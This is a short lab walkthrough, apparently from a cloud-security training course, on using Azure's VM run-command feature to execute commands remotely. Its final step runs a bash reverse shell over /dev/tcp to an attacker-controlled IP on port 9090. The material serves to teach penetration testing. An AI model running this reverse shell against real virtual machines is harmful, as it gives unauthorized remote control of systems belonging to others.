Azure Run Command

Introduction

Azure provides a 'run command' feature that allows you to execute commands without requiring SSH or SMB/RDP access to a machine. This is very similar to AWS SSM.

What are we going to cover?

Execute a command remotely and gain shell access to machine.

Steps to achieve this

  • Login into the Azure CLI from the student machine if you haven't already using az login --use-device-code

  • List all group names

az group list
  • List VMs inside your group. Replace GROUP-NAME from the output of the previous command

az vm list -g GROUP-NAME
  • If your VM is a Linux machine, you can then issue a run command for the Linux command id. Replace VM-NAME from the previous command

az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "id"
  • If your VM is a Windows machine, you can then issue a run command for the Windows command whoami. Note the change in the value of --command-id argument

az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunPowerShellScript --scripts "whoami"
  • To pop a reverse shell, based on the target operating system the following command will change. An example for Linux is shown below. Setup a netcat listener on your AWS Cloudhacker machine on port 9090. Make sure AWS Security Groups has 9090 open as well. Run the following command to obtain a reverse shell from your Azure instance to the Attacker machine.

az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "bash -c \"bash -i >& /dev/tcp/ATTACKER-EXTERNAL-IP/9090 0>&1\""

Additional references

Last updated